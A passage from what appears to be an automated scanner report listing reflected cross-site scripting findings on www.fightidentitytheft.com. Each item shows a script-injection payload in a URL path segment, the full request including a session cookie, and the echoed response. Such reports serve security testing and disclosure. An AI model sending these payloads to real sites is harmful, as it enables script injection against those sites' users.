<a href="/print/sitesc42f9"><script>alert(1)</script>43c15deb34d/all/modules/mollom/mollom.js?i">
...[SNIP]...

6.290. http://www.fightidentitytheft.com/sites/all/modules/mollom/mollom.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/mollom/mollom.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9fa2"><script>alert(1)</script>7e425c18406 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/allb9fa2"><script>alert(1)</script>7e425c18406/modules/mollom/mollom.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:49:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:49:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/allb9fa2"><script>alert(1)</script>7e425c18406/modules/mollom/mollom.js?i">
...[SNIP]...

6.291. http://www.fightidentitytheft.com/sites/all/modules/mollom/mollom.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/mollom/mollom.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a6f4"><script>alert(1)</script>be2ae1e5386 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules3a6f4"><script>alert(1)</script>be2ae1e5386/mollom/mollom.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:50:39 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:50:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modules3a6f4"><script>alert(1)</script>be2ae1e5386/mollom/mollom.js?i">
...[SNIP]...

6.292. http://www.fightidentitytheft.com/sites/all/modules/mollom/mollom.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/mollom/mollom.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a7b8"><script>alert(1)</script>6745f0b47f9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/mollom5a7b8"><script>alert(1)</script>6745f0b47f9/mollom.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:52:05 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:52:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modules/mollom5a7b8"><script>alert(1)</script>6745f0b47f9/mollom.js?i">
...[SNIP]...

6.293. http://www.fightidentitytheft.com/sites/all/modules/mollom/mollom.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/mollom/mollom.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c35d"><script>alert(1)</script>6084559faf2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/mollom/mollom.js9c35d"><script>alert(1)</script>6084559faf2?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:53:24 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:53:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modules/mollom/mollom.js9c35d"><script>alert(1)</script>6084559faf2?i">
...[SNIP]...

6.294. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/nice_menus.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/nice_menus.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff48f"><script>alert(1)</script>ef11a38dab2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitesff48f"><script>alert(1)</script>ef11a38dab2/all/modules/nice_menus/nice_menus.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:48:59 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:48:59 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sitesff48f"><script>alert(1)</script>ef11a38dab2/all/modules/nice_menus/nice_menus.js?i">
...[SNIP]...

6.295. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/nice_menus.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/nice_menus.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b3ff"><script>alert(1)</script>873c21bc0cb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all4b3ff"><script>alert(1)</script>873c21bc0cb/modules/nice_menus/nice_menus.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:50:36 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:50:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all4b3ff"><script>alert(1)</script>873c21bc0cb/modules/nice_menus/nice_menus.js?i">
...[SNIP]...

6.296. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/nice_menus.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/nice_menus.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49b5e"><script>alert(1)</script>6be5865fb07 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules49b5e"><script>alert(1)</script>6be5865fb07/nice_menus/nice_menus.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:52:02 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:52:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modules49b5e"><script>alert(1)</script>6be5865fb07/nice_menus/nice_menus.js?i">
...[SNIP]...

6.297. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/nice_menus.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/nice_menus.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b46a"><script>alert(1)</script>d116179b969 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/nice_menus5b46a"><script>alert(1)</script>d116179b969/nice_menus.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:53:22 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:53:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modules/nice_menus5b46a"><script>alert(1)</script>d116179b969/nice_menus.js?i">
...[SNIP]...

6.298. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/nice_menus.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/nice_menus.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b01f4"><script>alert(1)</script>1c45ca5c850 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/nice_menus/nice_menus.jsb01f4"><script>alert(1)</script>1c45ca5c850?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:54:30 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:54:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modules/nice_menus/nice_menus.jsb01f4"><script>alert(1)</script>1c45ca5c850?i">
...[SNIP]...

6.299. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcbe9"><script>alert(1)</script>af3fa32f08d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitesfcbe9"><script>alert(1)</script>af3fa32f08d/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:48:51 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:48:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sitesfcbe9"><script>alert(1)</script>af3fa32f08d/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js?i">
...[SNIP]...

6.300. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b05b"><script>alert(1)</script>e245ff455b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all1b05b"><script>alert(1)</script>e245ff455b0/modules/nice_menus/superfish/js/jquery.bgiframe.min.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:50:29 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:50:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all1b05b"><script>alert(1)</script>e245ff455b0/modules/nice_menus/superfish/js/jquery.bgiframe.min.js?i">
...[SNIP]...

6.301. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1447"><script>alert(1)</script>23932a64c9e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modulesf1447"><script>alert(1)</script>23932a64c9e/nice_menus/superfish/js/jquery.bgiframe.min.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:52:00 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:52:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modulesf1447"><script>alert(1)</script>23932a64c9e/nice_menus/superfish/js/jquery.bgiframe.min.js?i">
...[SNIP]...

6.302. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80b09"><script>alert(1)</script>6073c3dd0df was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/nice_menus80b09"><script>alert(1)</script>6073c3dd0df/superfish/js/jquery.bgiframe.min.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:53:17 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:53:17 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modules/nice_menus80b09"><script>alert(1)</script>6073c3dd0df/superfish/js/jquery.bgiframe.min.js?i">
...[SNIP]...

6.303. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14ab9"><script>alert(1)</script>e32dcc02810 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

